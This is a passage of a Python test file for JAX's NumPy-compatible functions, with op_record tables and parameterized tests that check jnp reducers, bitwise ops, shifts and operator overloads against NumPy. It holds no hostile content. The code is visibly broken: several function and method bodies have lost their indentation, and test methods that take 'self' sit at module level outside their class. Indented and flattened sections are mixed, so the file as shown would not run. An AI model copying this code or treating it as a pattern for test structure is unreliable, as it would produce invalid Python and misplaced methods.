    op_record("unwrap", 1, [t for t in float_dtypes if t != dtypes.bfloat16],
              nonempty_nonscalar_array_shapes,
              jtu.rand_default, ["rev"],
              # numpy.unwrap always returns float64
              check_dtypes=False,
              # numpy cumsum is inaccurate, see issue #3517
              tolerance={dtypes.bfloat16: 1e-1, np.float16: 1e-1}),
    op_record("isclose", 2, [t for t in all_dtypes if t != jnp.bfloat16],
              all_shapes, jtu.rand_small_positive, []),
    op_record("gcd", 2, int_dtypes_no_uint64, all_shapes, jtu.rand_default, []),
    op_record("lcm", 2, int_dtypes_no_uint64, all_shapes, jtu.rand_default, []),
]
# Bitwise ops on integer/unsigned dtypes; consumed by testBitwiseOp.
JAX_BITWISE_OP_RECORDS = [
    op_record("bitwise_and", 2, int_dtypes + unsigned_dtypes, all_shapes,
              jtu.rand_bool, []),
    op_record("bitwise_not", 1, int_dtypes + unsigned_dtypes, all_shapes,
              jtu.rand_bool, []),
    op_record("invert", 1, int_dtypes + unsigned_dtypes, all_shapes,
              jtu.rand_bool, []),
    op_record("bitwise_or", 2, int_dtypes + unsigned_dtypes, all_shapes,
              jtu.rand_bool, []),
    op_record("bitwise_xor", 2, int_dtypes + unsigned_dtypes, all_shapes,
              jtu.rand_bool, []),
]

# Generic reduction records.
JAX_REDUCER_RECORDS = [
    op_record("mean", 1, number_dtypes, nonempty_shapes, jtu.rand_default, [],
              inexact=True),
    op_record("prod", 1, all_dtypes, all_shapes, jtu.rand_small_positive, []),
    op_record("sum", 1, all_dtypes, all_shapes, jtu.rand_default, []),
    op_record("nanmean", 1, inexact_dtypes, nonempty_shapes, jtu.rand_some_nan,
              [], inexact=True),
    op_record("nanprod", 1, all_dtypes, all_shapes, jtu.rand_some_nan, []),
    op_record("nansum", 1, number_dtypes, all_shapes, jtu.rand_some_nan, []),
]

# Reductions to exercise with an `initial` argument (per the list's name).
JAX_REDUCER_INITIAL_RECORDS = [
    op_record("prod", 1, all_dtypes, all_shapes, jtu.rand_small_positive, []),
    op_record("sum", 1, all_dtypes, all_shapes, jtu.rand_default, []),
    op_record("max", 1, all_dtypes, all_shapes, jtu.rand_default, []),
    op_record("min", 1, all_dtypes, all_shapes, jtu.rand_default, []),
]

# Reductions to exercise with `where` but without `initial` (per the name).
JAX_REDUCER_WHERE_NO_INITIAL_RECORDS = [
    op_record("all", 1, bool_dtypes, all_shapes, jtu.rand_some_zero, []),
    op_record("any", 1, bool_dtypes, all_shapes, jtu.rand_some_zero, []),
    op_record("mean", 1, all_dtypes, nonempty_shapes, jtu.rand_default, [],
              inexact=True),
    op_record("var", 1, all_dtypes, nonempty_shapes, jtu.rand_default, [],
              inexact=True),
    op_record("std", 1, all_dtypes, nonempty_shapes, jtu.rand_default, [],
              inexact=True),
]

# Reductions to exercise without a dtype argument (per the name).
JAX_REDUCER_NO_DTYPE_RECORDS = [
    op_record("all", 1, all_dtypes, all_shapes, jtu.rand_some_zero, []),
    op_record("any", 1, all_dtypes, all_shapes, jtu.rand_some_zero, []),
    op_record("max", 1, all_dtypes, nonempty_shapes, jtu.rand_default, []),
    op_record("min", 1, all_dtypes, nonempty_shapes, jtu.rand_default, []),
    op_record("var", 1, all_dtypes, nonempty_shapes, jtu.rand_default, [],
              inexact=True),
    op_record("std", 1, all_dtypes, nonempty_shapes, jtu.rand_default, [],
              inexact=True),
    op_record("nanmax", 1, all_dtypes, nonempty_shapes, jtu.rand_some_nan, []),
    op_record("nanmin", 1, all_dtypes, nonempty_shapes, jtu.rand_some_nan, []),
    op_record("nanvar", 1, all_dtypes, nonempty_shapes, jtu.rand_some_nan,
              [], inexact=True),
    op_record("nanstd", 1, all_dtypes, nonempty_shapes, jtu.rand_some_nan,
              [], inexact=True),
    op_record("ptp", 1, number_dtypes, nonempty_shapes, jtu.rand_default, []),
]

# Index-returning reductions (argmin/argmax and their nan-aware variants).
JAX_ARGMINMAX_RECORDS = [
    op_record("argmin", 1, default_dtypes, nonempty_shapes, jtu.rand_some_equal, []),
    op_record("argmax", 1, default_dtypes, nonempty_shapes, jtu.rand_some_equal, []),
    op_record("nanargmin", 1, default_dtypes, nonempty_shapes, jtu.rand_some_nan, []),
    op_record("nanargmax", 1, default_dtypes, nonempty_shapes, jtu.rand_some_nan, []),
]
# Dunder-method records: exercise the operator overloads on jnp arrays;
# consumed by testOperatorOverload and testBinaryOperatorDefers.
JAX_OPERATOR_OVERLOADS = [
    op_record("__add__", 2, number_dtypes, all_shapes, jtu.rand_default, []),
    op_record("__sub__", 2, number_dtypes, all_shapes, jtu.rand_default, []),
    op_record("__mul__", 2, number_dtypes, all_shapes, jtu.rand_default, []),
    op_record("__eq__", 2, number_dtypes, all_shapes, jtu.rand_default, []),
    op_record("__ne__", 2, number_dtypes, all_shapes, jtu.rand_default, []),
    op_record("__lt__", 2, default_dtypes, all_shapes, jtu.rand_default, []),
    op_record("__le__", 2, default_dtypes, all_shapes, jtu.rand_default, []),
    op_record("__gt__", 2, default_dtypes, all_shapes, jtu.rand_default, []),
    op_record("__ge__", 2, default_dtypes, all_shapes, jtu.rand_default, []),
    op_record("__pos__", 1, number_dtypes, all_shapes, jtu.rand_default, []),
    op_record("__neg__", 1, number_dtypes, all_shapes, jtu.rand_default, []),
    op_record("__pow__", 2, inexact_dtypes, all_shapes, jtu.rand_positive, [],
              tolerance={np.float32: 2e-4, np.complex64: 2e-4, np.complex128: 1e-14}),
    op_record("__mod__", 2, default_dtypes, all_shapes, jtu.rand_nonzero, [],
              tolerance={np.float16: 1e-1}),
    op_record("__floordiv__", 2, default_dtypes, all_shapes,
              jtu.rand_nonzero, []),
    op_record("__truediv__", 2, number_dtypes, all_shapes, jtu.rand_nonzero, [],
              inexact=True),
    op_record("__abs__", 1, number_dtypes, all_shapes, jtu.rand_default, []),
    # TODO(mattjj): __invert__ fails on bool dtypes because ~True == -2
    op_record("__invert__", 1, int_dtypes, all_shapes, jtu.rand_default, []),
    # TODO(mattjj): investigate these failures
    # op_record("__or__", 2, number_dtypes, all_shapes, jtu.rand_bool, []),
    # op_record("__and__", 2, number_dtypes, all_shapes, jtu.rand_default, []),
    # op_record("__xor__", 2, number_dtypes, all_shapes, jtu.rand_bool, []),
    # op_record("__divmod__", 2, number_dtypes, all_shapes, jtu.rand_nonzero, []),
    op_record("__lshift__", 2, int_dtypes_no_uint64, all_shapes, partial(jtu.rand_int, high=8), []),
    op_record("__rshift__", 2, int_dtypes_no_uint64, all_shapes, partial(jtu.rand_int, high=8), []),
]

# Reflected (right-hand) operator records; consumed by testRightOperatorOverload.
JAX_RIGHT_OPERATOR_OVERLOADS = [
    op_record("__radd__", 2, number_dtypes, all_shapes, jtu.rand_default, []),
    op_record("__rsub__", 2, number_dtypes, all_shapes, jtu.rand_default, []),
    op_record("__rmul__", 2, number_dtypes, all_shapes, jtu.rand_default, []),
    op_record("__rpow__", 2, inexact_dtypes, all_shapes, jtu.rand_positive, [],
              tolerance={np.float32: 2e-4, np.complex64: 1e-3}),
    op_record("__rmod__", 2, default_dtypes, all_shapes, jtu.rand_nonzero, [],
              tolerance={np.float16: 1e-1}),
    op_record("__rfloordiv__", 2, default_dtypes, all_shapes,
              jtu.rand_nonzero, []),
    op_record("__rtruediv__", 2, number_dtypes, all_shapes, jtu.rand_nonzero, [],
              inexact=True),
    # op_record("__ror__", 2, number_dtypes, all_shapes, jtu.rand_bool, []),
    # op_record("__rand__", 2, number_dtypes, all_shapes, jtu.rand_default, []),
    # op_record("__rxor__", 2, number_dtypes, all_shapes, jtu.rand_bool, []),
    # op_record("__rdivmod__", 2, number_dtypes, all_shapes, jtu.rand_nonzero, []),
    op_record("__rlshift__", 2, int_dtypes_no_uint64, all_shapes, partial(jtu.rand_int, high=8), []),
    op_record("__rrshift__", 2, int_dtypes_no_uint64, all_shapes, partial(jtu.rand_int, high=8), [])
]
class _OverrideEverything(object):
  """Stub whose binary operator overloads always claim the operation."""
  pass


class _OverrideNothing(object):
  """Stub whose binary operator overloads always defer (NotImplemented)."""
  pass


# Install every binary dunder from the overload records on both stubs.
for rec in JAX_OPERATOR_OVERLOADS + JAX_RIGHT_OPERATOR_OVERLOADS:
  if rec.nargs == 2:
    setattr(_OverrideEverything, rec.name, lambda self, other: self)
    setattr(_OverrideNothing, rec.name, lambda self, other: NotImplemented)
def _dtypes_are_compatible_for_bitwise_ops(args):
if len(args) <= 1:
return True
is_signed = lambda dtype: jnp.issubdtype(dtype, np.signedinteger)
width = lambda dtype: jnp.iinfo(dtype).bits
x, y = args
if width(x) > width(y):
x, y = y, x
# The following condition seems a little ad hoc, but seems to capture what
# numpy actually implements.
return (
is_signed(x) == is_signed(y)
or (width(x) == 32 and width(y) == 32)
or (width(x) == 32 and width(y) == 64 and is_signed(y)))
def _shapes_are_broadcast_compatible(shapes):
accumulator = np.zeros([])
for shape in shapes:
try:
accumulator = accumulator + np.zeros(shape)
except ValueError:
return False
return True
def _shapes_are_equal_length(shapes):
return all(len(shape) == len(shapes[0]) for shape in shapes[1:])
def _promote_like_jnp(fun, inexact=False):
"""Decorator that promotes the arguments of `fun` to `jnp.result_type(*args)`.
jnp and np have different type promotion semantics; this decorator allows
tests make an np reference implementation act more like an jnp
implementation.
"""
def wrapper(*args, **kw):
flat_args = tree_util.tree_leaves(args)
if inexact and not any(jnp.issubdtype(jnp.result_type(x), jnp.inexact)
for x in flat_args):
dtype = jnp.result_type(jnp.float_, *flat_args)
else:
dtype = jnp.result_type(*flat_args)
args = tree_util.tree_map(lambda a: np.asarray(a, dtype), args)
return fun(*args, **kw)
return wrapper
@jtu.with_config(jax_numpy_rank_promotion="raise")
class LaxBackedNumpyTests(jtu.JaxTestCase):
"""Tests for LAX-backed Numpy implementation."""
def _GetArgsMaker(self, rng, shapes, dtypes, np_arrays=True):
def f():
out = [rng(shape, dtype or jnp.float_)
for shape, dtype in zip(shapes, dtypes)]
if np_arrays:
return out
return [jnp.asarray(a) if isinstance(a, (np.ndarray, np.generic)) else a
for a in out]
return f
def testNotImplemented(self):
for name in jnp._NOT_IMPLEMENTED:
func = getattr(jnp, name)
with self.assertRaises(NotImplementedError):
func()
  @parameterized.named_parameters(itertools.chain.from_iterable(
      jtu.cases_from_list(
          {"testcase_name": jtu.format_test_name_suffix(rec.test_name, shapes,
                                                        dtypes),
           "rng_factory": rec.rng_factory, "shapes": shapes, "dtypes": dtypes,
           "np_op": getattr(np, rec.name), "jnp_op": getattr(jnp, rec.name),
           "check_dtypes": rec.check_dtypes, "tolerance": rec.tolerance,
           "inexact": rec.inexact}
          for shapes in filter(
              _shapes_are_broadcast_compatible,
              itertools.combinations_with_replacement(rec.shapes, rec.nargs))
          for dtypes in itertools.product(
              *(_valid_dtypes_for_shape(s, rec.dtypes) for s in shapes)))
      for rec in itertools.chain(JAX_ONE_TO_ONE_OP_RECORDS,
                                 JAX_COMPOUND_OP_RECORDS)))
  @jax.numpy_rank_promotion('allow')  # This test explicitly exercises implicit rank promotion.
  def testOp(self, np_op, jnp_op, rng_factory, shapes, dtypes, check_dtypes,
             tolerance, inexact):
    # Checks each jnp op against its numpy reference on random inputs.
    # Silence numpy warnings that some records intentionally trigger.
    np_op = jtu.ignore_warning(category=RuntimeWarning,
                               message="invalid value.*")(np_op)
    np_op = jtu.ignore_warning(category=RuntimeWarning,
                               message="divide by zero.*")(np_op)

    rng = rng_factory(self.rng())
    args_maker = self._GetArgsMaker(rng, shapes, dtypes, np_arrays=False)
    # Merge the per-record tolerance with the per-dtype defaults.
    tol = max(jtu.tolerance(dtype, tolerance) for dtype in dtypes)
    tol = functools.reduce(jtu.join_tolerance,
                           [tolerance, tol, jtu.default_tolerance()])
    self._CheckAgainstNumpy(_promote_like_jnp(np_op, inexact), jnp_op,
                            args_maker, check_dtypes=check_dtypes, tol=tol)
    self._CompileAndCheck(jnp_op, args_maker, check_dtypes=check_dtypes,
                          atol=tol, rtol=tol)
  @parameterized.named_parameters(itertools.chain.from_iterable(
      jtu.cases_from_list(
          {"testcase_name": jtu.format_test_name_suffix(rec.test_name, shapes,
                                                        dtypes),
           "rng_factory": rec.rng_factory, "shapes": shapes, "dtypes": dtypes, "name": rec.name,
           "tol": rec.tolerance}
          for shapes in filter(
              _shapes_are_broadcast_compatible,
              itertools.combinations_with_replacement(rec.shapes, rec.nargs))
          for dtypes in itertools.product(
              *(_valid_dtypes_for_shape(s, rec.dtypes) for s in shapes)))
      for rec in JAX_OPERATOR_OVERLOADS))
  @jax.numpy_rank_promotion('allow')  # This test explicitly exercises implicit rank promotion.
  def testOperatorOverload(self, name, rng_factory, shapes, dtypes, tol):
    # Exercises the dunder (e.g. __add__) via the `operator` module.
    rng = rng_factory(self.rng())
    # np and jnp arrays have different type promotion rules; force the use of
    # jnp arrays.
    args_maker = self._GetArgsMaker(rng, shapes, dtypes, np_arrays=False)
    fun = lambda *xs: getattr(operator, name.strip('_'))(*xs)
    self._CompileAndCheck(fun, args_maker, atol=tol, rtol=tol)
  @parameterized.named_parameters(itertools.chain.from_iterable(
      jtu.cases_from_list(
          {"testcase_name": jtu.format_test_name_suffix(rec.test_name, shapes,
                                                        dtypes),
           "rng_factory": rec.rng_factory, "shapes": shapes, "dtypes": dtypes, "name": rec.name,
           "op_tolerance": rec.tolerance}
          for shapes in filter(
              _shapes_are_broadcast_compatible,
              itertools.combinations_with_replacement(rec.shapes, rec.nargs))
          for dtypes in itertools.product(
              *(_valid_dtypes_for_shape(s, rec.dtypes) for s in shapes)))
      for rec in JAX_RIGHT_OPERATOR_OVERLOADS))
  @jax.numpy_rank_promotion('allow')  # This test explicitly exercises implicit rank promotion.
  def testRightOperatorOverload(self, name, rng_factory, shapes, dtypes,
                                op_tolerance):
    # Invokes the reflected dunder (e.g. __radd__) on the second operand.
    if shapes[1] is jtu.PYTHON_SCALAR_SHAPE:
      raise SkipTest("scalars not implemented")  # TODO(mattjj): clean up
    rng = rng_factory(self.rng())
    args_maker = self._GetArgsMaker(rng, shapes, dtypes, np_arrays=False)
    fun = lambda fst, snd: getattr(snd, name)(fst)
    tol = max(jtu.tolerance(dtype, op_tolerance) for dtype in dtypes)
    self._CompileAndCheck(fun, args_maker, atol=tol, rtol=tol)
  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name": rec.test_name + "_{}".format(dtype),
       "rng_factory": rec.rng_factory,
       "op_name": rec.name, "dtype": dtype}
      for rec in JAX_OPERATOR_OVERLOADS if rec.nargs == 2
      for dtype in rec.dtypes))
  def testBinaryOperatorDefers(self, op_name, rng_factory, dtype):
    # Binary ops on a jnp array must defer to the other operand's overloads:
    # _OverrideEverything claims every op, _OverrideNothing declines every op.
    rng = rng_factory(self.rng())
    arg = jax.device_put(rng((), dtype))
    op = getattr(operator, op_name)

    other = _OverrideEverything()
    assert op(other, arg) is other
    assert op(arg, other) is other

    other = _OverrideNothing()
    if op_name == "__eq__":
      # Both sides return NotImplemented, so Python falls back to identity.
      assert op(other, arg) is False
      assert op(arg, other) is False
    elif op_name == "__ne__":
      assert op(other, arg) is True
      assert op(arg, other) is True
    else:
      # For other ops the double-NotImplemented case raises TypeError.
      with self.assertRaises(TypeError):
        op(other, arg)
      with self.assertRaises(TypeError):
        op(arg, other)
def testArrayEqualExamples(self):
# examples from the array_equal() docstring.
self.assertTrue(jnp.array_equal([1, 2], [1, 2]))
self.assertTrue(jnp.array_equal(np.array([1, 2]), np.array([1, 2])))
self.assertFalse(jnp.array_equal([1, 2], [1, 2, 3]))
self.assertFalse(jnp.array_equal([1, 2], [1, 4]))
a = np.array([1, np.nan])
self.assertFalse(jnp.array_equal(a, a))
self.assertTrue(jnp.array_equal(a, a, equal_nan=True))
a = np.array([1 + 1j])
b = a.copy()
a.real = np.nan
b.imag = np.nan
self.assertTrue(jnp.array_equal(a, b, equal_nan=True))
def testArrayEquivExamples(self):
# examples from the array_equiv() docstring.
self.assertTrue(jnp.array_equiv([1, 2], [1, 2]))
self.assertFalse(jnp.array_equiv([1, 2], [1, 3]))
with jax.numpy_rank_promotion('allow'):
self.assertTrue(jnp.array_equiv([1, 2], [[1, 2], [1, 2]]))
self.assertFalse(jnp.array_equiv([1, 2], [[1, 2, 1, 2], [1, 2, 1, 2]]))
self.assertFalse(jnp.array_equiv([1, 2], [[1, 2], [1, 3]]))
  def testArrayModule(self):
    # Checks array-module dispatch via the experimental numpy-dispatch
    # package: jnp arrays should resolve to the jnp module, including under
    # jit and grad transformations.
    if numpy_dispatch is None:
      raise SkipTest('requires https://github.com/seberg/numpy-dispatch')

    jnp_array = jnp.array(1.0)
    np_array = np.array(1.0)

    module = numpy_dispatch.get_array_module(jnp_array)
    self.assertIs(module, jnp)

    # Mixed jnp/np inputs still resolve to jnp.
    module = numpy_dispatch.get_array_module(jnp_array, np_array)
    self.assertIs(module, jnp)

    def f(x):
      module = numpy_dispatch.get_array_module(x)
      self.assertIs(module, jnp)
      return x
    jax.jit(f)(jnp_array)
    jax.grad(f)(jnp_array)
# Parameterized over JAX_BITWISE_OP_RECORDS, all broadcast-compatible shape
# tuples, and all dtype combinations valid for bitwise ops.
@parameterized.named_parameters(itertools.chain.from_iterable(
    jtu.cases_from_list(
      {"testcase_name": jtu.format_test_name_suffix(
          rec.test_name, shapes, dtypes),
       "rng_factory": rec.rng_factory, "shapes": shapes, "dtypes": dtypes,
       "np_op": getattr(np, rec.name), "jnp_op": getattr(jnp, rec.name)}
      for shapes in filter(
        _shapes_are_broadcast_compatible,
        itertools.combinations_with_replacement(rec.shapes, rec.nargs))
      for dtypes in filter(
        _dtypes_are_compatible_for_bitwise_ops,
        itertools.combinations_with_replacement(rec.dtypes, rec.nargs)))
    for rec in JAX_BITWISE_OP_RECORDS))
@jax.numpy_rank_promotion('allow')  # This test explicitly exercises implicit rank promotion.
def testBitwiseOp(self, np_op, jnp_op, rng_factory, shapes, dtypes):
  """Check each jnp bitwise op against its NumPy counterpart."""
  rng = rng_factory(self.rng())
  # 64-bit integer inputs are only representable when x64 mode is on.
  if not config.x64_enabled and any(
      jnp.iinfo(dtype).bits == 64 for dtype in dtypes):
    self.skipTest("x64 types are disabled by jax_enable_x64")
  args_maker = self._GetArgsMaker(rng, shapes, dtypes)
  # Python scalar operands promote differently; skip dtype checks for them.
  self._CheckAgainstNumpy(np_op, jnp_op, args_maker,
                          check_dtypes=jtu.PYTHON_SCALAR_SHAPE not in shapes)
  self._CompileAndCheck(jnp_op, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": jtu.format_test_name_suffix(op.__name__, shapes, dtypes),
     "op": op, "dtypes": dtypes, "shapes": shapes}
    for op in [jnp.left_shift, jnp.right_shift]
    for shapes in filter(
      _shapes_are_broadcast_compatible,
      # TODO numpy always promotes to shift dtype for zero-dim shapes:
      itertools.combinations_with_replacement(nonzerodim_shapes, 2))
    for dtypes in itertools.product(
      *(_valid_dtypes_for_shape(s, int_dtypes_no_uint64) for s in shapes))))
@jax.numpy_rank_promotion('allow')  # This test explicitly exercises implicit rank promotion.
def testShiftOpAgainstNumpy(self, op, dtypes, shapes):
  """Check jnp.left_shift/right_shift against NumPy for integer dtype mixes.

  Skips mixed signed/unsigned 32-bit combinations in 32-bit mode, where
  NumPy's promotion reaches int64 but JAX cannot follow.
  """
  dtype, shift_dtype = dtypes
  signed_mix = np.issubdtype(dtype, np.signedinteger) != \
               np.issubdtype(shift_dtype, np.signedinteger)
  has_32 = any(np.iinfo(d).bits == 32 for d in dtypes)
  promoting_to_64 = has_32 and signed_mix
  if promoting_to_64 and not config.x64_enabled:
    # Fix: the adjacent string literals previously joined without a space,
    # yielding the garbled message "...int64differs from jnp...".
    self.skipTest("np.right_shift/left_shift promoting to int64 "
                  "differs from jnp in 32 bit mode.")

  info, shift_info = map(np.iinfo, dtypes)
  x_rng = jtu.rand_int(self.rng(), low=info.min, high=info.max + 1)
  # NumPy requires shifts to be non-negative and below the bit width:
  shift_rng = jtu.rand_int(self.rng(), high=max(info.bits, shift_info.bits))
  args_maker = lambda: (x_rng(shapes[0], dtype), shift_rng(shapes[1], shift_dtype))

  self._CompileAndCheck(op, args_maker)
  np_op = getattr(np, op.__name__)
  self._CheckAgainstNumpy(np_op, op, args_maker)
@parameterized.named_parameters(itertools.chain.from_iterable(
    jtu.cases_from_list(
      {"testcase_name": "{}_inshape={}_axis={}_dtype={}_keepdims={}".format(
          rec.test_name.capitalize(),
          jtu.format_shape_dtype_string(shape, dtype), axis,
          "None" if out_dtype is None else np.dtype(out_dtype).name, keepdims),
       "rng_factory": rec.rng_factory, "shape": shape, "dtype": dtype, "out_dtype": out_dtype,
       "np_op": getattr(np, rec.name), "jnp_op": getattr(jnp, rec.name),
       "axis": axis, "keepdims": keepdims, "inexact": rec.inexact}
      for shape in rec.shapes for dtype in rec.dtypes
      for out_dtype in [None] + rec.dtypes
      for axis in list(range(-len(shape), len(shape))) + [None]
      for keepdims in [False, True])
    for rec in JAX_REDUCER_RECORDS))
def testReducer(self, np_op, jnp_op, rng_factory, shape, dtype, out_dtype,
                axis, keepdims, inexact):
  """Check jnp reducers that accept a `dtype` argument against NumPy."""
  rng = rng_factory(self.rng())
  @jtu.ignore_warning(category=np.ComplexWarning)
  @jtu.ignore_warning(category=RuntimeWarning,
                      message="mean of empty slice.*")
  @jtu.ignore_warning(category=RuntimeWarning,
                      message="overflow encountered.*")
  def np_fun(x):
    # NumPy lacks bfloat16 support, so compute via float32 instead.
    x_cast = x if dtype != jnp.bfloat16 else x.astype(np.float32)
    t = out_dtype if out_dtype != jnp.bfloat16 else np.float32
    return np_op(x_cast, axis, dtype=t, keepdims=keepdims)
  np_fun = _promote_like_jnp(np_fun, inexact)
  jnp_fun = lambda x: jnp_op(x, axis, dtype=out_dtype, keepdims=keepdims)
  jnp_fun = jtu.ignore_warning(category=jnp.ComplexWarning)(jnp_fun)
  args_maker = lambda: [rng(shape, dtype)]
  # Tolerance is taken from the wider of the input and output dtypes.
  tol_spec = {np.float16: 1e-2, np.int32: 1E-3, np.float32: 1e-3,
              np.complex64: 1e-3, np.float64: 1e-5, np.complex128: 1e-5}
  tol = jtu.tolerance(dtype, tol_spec)
  tol = max(tol, jtu.tolerance(out_dtype, tol_spec)) if out_dtype else tol
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker,
                          check_dtypes=jnp.bfloat16 not in (dtype, out_dtype),
                          tol=tol)
  self._CompileAndCheck(jnp_fun, args_maker, atol=tol,
                        rtol=tol)
@parameterized.named_parameters(itertools.chain.from_iterable(
    jtu.cases_from_list(
      {"testcase_name": "{}_inshape={}_axis={}_keepdims={}".format(
          rec.test_name.capitalize(),
          jtu.format_shape_dtype_string(shape, dtype), axis, keepdims),
       "rng_factory": rec.rng_factory, "shape": shape, "dtype": dtype,
       "np_op": getattr(np, rec.name), "jnp_op": getattr(jnp, rec.name),
       "axis": axis, "keepdims": keepdims, "inexact": rec.inexact}
      for shape in rec.shapes for dtype in rec.dtypes
      for axis in list(range(-len(shape), len(shape))) + [None]
      for keepdims in [False, True])
    for rec in JAX_REDUCER_NO_DTYPE_RECORDS))
def testReducerNoDtype(self, np_op, jnp_op, rng_factory, shape, dtype, axis,
                       keepdims, inexact):
  """Check jnp reducers without a `dtype` argument against NumPy."""
  rng = rng_factory(self.rng())
  # For NaN-containing bfloat16 inputs, run NumPy in float32 and cast back,
  # since NumPy cannot compute in bfloat16 directly.
  is_bf16_nan_test = dtype == jnp.bfloat16 and rng_factory.__name__ == 'rand_some_nan'
  @jtu.ignore_warning(category=RuntimeWarning,
                      message="Degrees of freedom <= 0 for slice.*")
  @jtu.ignore_warning(category=RuntimeWarning,
                      message="All-NaN slice encountered.*")
  def np_fun(x):
    x_cast = x if not is_bf16_nan_test else x.astype(np.float32)
    res = np_op(x_cast, axis, keepdims=keepdims)
    res = res if not is_bf16_nan_test else res.astype(jnp.bfloat16)
    return res
  np_fun = _promote_like_jnp(np_fun, inexact)
  jnp_fun = lambda x: jnp_op(x, axis, keepdims=keepdims)
  args_maker = lambda: [rng(shape, dtype)]
  tol = {np.float16: 0.002}
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, tol=tol)
  self._CompileAndCheck(jnp_fun, args_maker, rtol=tol, atol=tol)
@parameterized.named_parameters(itertools.chain.from_iterable(
    jtu.cases_from_list(
      {"testcase_name": "{}_inshape={}_axis={}_keepdims={}_initial={}".format(
          rec.test_name.capitalize(),
          jtu.format_shape_dtype_string(shape, dtype), axis, keepdims, initial),
       "rng_factory": rec.rng_factory, "shape": shape, "dtype": dtype,
       "np_op": getattr(np, rec.name), "jnp_op": getattr(jnp, rec.name),
       "initial": initial, "axis": axis, "keepdims": keepdims, "inexact": rec.inexact}
      for shape in rec.shapes for dtype in rec.dtypes
      for axis in list(range(-len(shape), len(shape))) + [None]
      for initial in [0, 1] for keepdims in [False, True])
    for rec in JAX_REDUCER_INITIAL_RECORDS))
def testReducerInitial(self, np_op, jnp_op, rng_factory, shape, dtype, axis,
                       keepdims, initial, inexact):
  """Check jnp reducers that accept an `initial` value against NumPy."""
  rng = rng_factory(self.rng())
  # For NaN-containing bfloat16 inputs, run NumPy in float32 and cast back.
  is_bf16_nan_test = dtype == jnp.bfloat16 and rng_factory.__name__ == 'rand_some_nan'
  @jtu.ignore_warning(category=RuntimeWarning,
                      message="Degrees of freedom <= 0 for slice.*")
  def np_fun(x):
    x_cast = x if not is_bf16_nan_test else x.astype(np.float32)
    res = np_op(x_cast, axis, keepdims=keepdims, initial=initial)
    res = res if not is_bf16_nan_test else res.astype(jnp.bfloat16)
    return res
  np_fun = _promote_like_jnp(np_fun, inexact)
  np_fun = jtu.ignore_warning(category=np.ComplexWarning)(np_fun)
  jnp_fun = lambda x: jnp_op(x, axis, keepdims=keepdims, initial=initial)
  jnp_fun = jtu.ignore_warning(category=jnp.ComplexWarning)(jnp_fun)
  args_maker = lambda: [rng(shape, dtype)]
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(itertools.chain.from_iterable(
    jtu.cases_from_list(
      {"testcase_name": "{}_inshape={}_axis={}_keepdims={}_initial={}_whereshape={}".format(
          rec.test_name.capitalize(),
          jtu.format_shape_dtype_string(shape, dtype), axis, keepdims, initial,
          jtu.format_shape_dtype_string(whereshape, bool)),
       "rng_factory": rec.rng_factory, "shape": shape, "dtype": dtype,
       "np_op": getattr(np, rec.name), "jnp_op": getattr(jnp, rec.name), "whereshape": whereshape,
       "initial": initial, "axis": axis, "keepdims": keepdims, "inexact": rec.inexact}
      for shape in rec.shapes for dtype in rec.dtypes
      for whereshape in _compatible_shapes(shape)
      for axis in list(range(-len(shape), len(shape))) + [None]
      for initial in [0, 1] for keepdims in [False, True])
    for rec in JAX_REDUCER_INITIAL_RECORDS))
def testReducerWhere(self, np_op, jnp_op, rng_factory, shape, dtype, axis,
                     keepdims, initial, inexact, whereshape):
  """Check jnp reducers with a `where` mask (plus `initial`) against NumPy."""
  if (shape in [()] + scalar_shapes and
      dtype in [jnp.int16, jnp.uint16] and
      jnp_op in [jnp.min, jnp.max]):
    self.skipTest("Known XLA failure; see https://github.com/google/jax/issues/4971.")
  rng = rng_factory(self.rng())
  # For NaN-containing bfloat16 inputs, run NumPy in float32 and cast back.
  is_bf16_nan_test = dtype == jnp.bfloat16 and rng_factory.__name__ == 'rand_some_nan'
  # Do not pass where via args_maker as that is incompatible with _promote_like_jnp.
  where = jtu.rand_bool(self.rng())(whereshape, np.bool_)
  @jtu.ignore_warning(category=RuntimeWarning,
                      message="Degrees of freedom <= 0 for slice.*")
  def np_fun(x):
    x_cast = x if not is_bf16_nan_test else x.astype(np.float32)
    res = np_op(x_cast, axis, keepdims=keepdims, initial=initial, where=where)
    res = res if not is_bf16_nan_test else res.astype(jnp.bfloat16)
    return res
  np_fun = _promote_like_jnp(np_fun, inexact)
  np_fun = jtu.ignore_warning(category=np.ComplexWarning)(np_fun)
  jnp_fun = lambda x: jnp_op(x, axis, keepdims=keepdims, initial=initial, where=where)
  jnp_fun = jtu.ignore_warning(category=jnp.ComplexWarning)(jnp_fun)
  args_maker = lambda: [rng(shape, dtype)]
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
  self._CompileAndCheck(jnp_fun, args_maker)
@unittest.skipIf(numpy_version < (1, 20), "where parameter not supported in older numpy")
@parameterized.named_parameters(itertools.chain.from_iterable(
    jtu.cases_from_list(
      {"testcase_name": "{}_inshape={}_axis={}_keepdims={}_whereshape={}".format(
          rec.test_name.capitalize(),
          jtu.format_shape_dtype_string(shape, dtype), axis, keepdims,
          jtu.format_shape_dtype_string(whereshape, bool)),
       "rng_factory": rec.rng_factory, "shape": shape, "dtype": dtype,
       "np_op": getattr(np, rec.name), "jnp_op": getattr(jnp, rec.name), "whereshape": whereshape,
       "axis": axis, "keepdims": keepdims, "inexact": rec.inexact}
      for shape in rec.shapes for dtype in rec.dtypes
      for whereshape in _compatible_shapes(shape)
      for axis in list(range(-len(shape), len(shape))) + [None]
      for keepdims in [False, True])
    for rec in JAX_REDUCER_WHERE_NO_INITIAL_RECORDS))
def testReducerWhereNoInitial(self, np_op, jnp_op, rng_factory, shape, dtype, axis,
                              keepdims, inexact, whereshape):
  """Check jnp reducers that take `where` without `initial` against NumPy."""
  rng = rng_factory(self.rng())
  # NumPy lacks bfloat16; compute in float32 and cast the result back.
  is_bf16_nan_test = dtype == jnp.bfloat16
  # Do not pass where via args_maker as that is incompatible with _promote_like_jnp.
  where = jtu.rand_bool(self.rng())(whereshape, np.bool_)
  @jtu.ignore_warning(category=RuntimeWarning,
                      message="Degrees of freedom <= 0 for slice.*")
  @jtu.ignore_warning(category=RuntimeWarning,
                      message="Mean of empty slice.*")
